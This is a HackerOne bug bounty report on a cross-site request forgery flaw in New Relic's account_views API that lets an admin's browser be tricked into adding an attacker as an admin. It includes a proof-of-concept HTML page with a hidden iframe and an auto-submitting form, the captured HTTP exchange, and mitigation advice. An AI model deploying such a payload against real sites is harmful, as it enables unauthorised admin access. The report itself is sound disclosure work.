New Relic: CSRF For Adding Users

ID H1:225326
Type hackerone
Reporter atestpk
Modified 2017-10-11T22:54:42


Issue The API affected is{{accountid}}/account_views.

Only admin users are allowed to add other new users, but a normal user with knowledge of the accountid can craft a webpage which does a CSRF when an admin user visits it.

There are 2 problems with it that can result in CSRF: 1. No check for authenticity_token 2. There is a referer header check but it is flawed. will bypass that.

PoC (replace accountid and host on a url that contains ``` <html> <iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<form name="adduser" action="" method="post" target="csrf-frame"> <input type="submit"> <input type="hidden" name="utf8" value="✓"> <input type="hidden" name="id" value="accountid"> <input type="hidden" name="account_view[user][email]" value=""> <input type="hidden" name="account_view[user][full_name]" value="attacker"> <input type="hidden" name="account_view[level]" value="admin"> <input type="hidden" name="account_view[user][job_title]" value=""> </form>

<script> document.forms.adduser.submit(); </script> </html> ```

An admin who visits this will add as an admin to the group.

CSRF Request and response ``` POST /accounts/1621740/account_views HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 196 Referer: [.......]



HTTP/1.1 302 Found Server: nginx Date: Mon, 01 May 2017 15:48:12 GMT Content-Type: text/html; charset=utf-8 Connection: Keep-Alive Status: 302 Found X-Frame-Options: DENY X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Location: [.....]

<html><body>You are being <a href="">redirected</a>.</body></html> ``````

The following POST request is successful as it redirects to

Mitigation * Check the CSRF token. * Check the referer url to see if it starts with (or other whitelist of domains)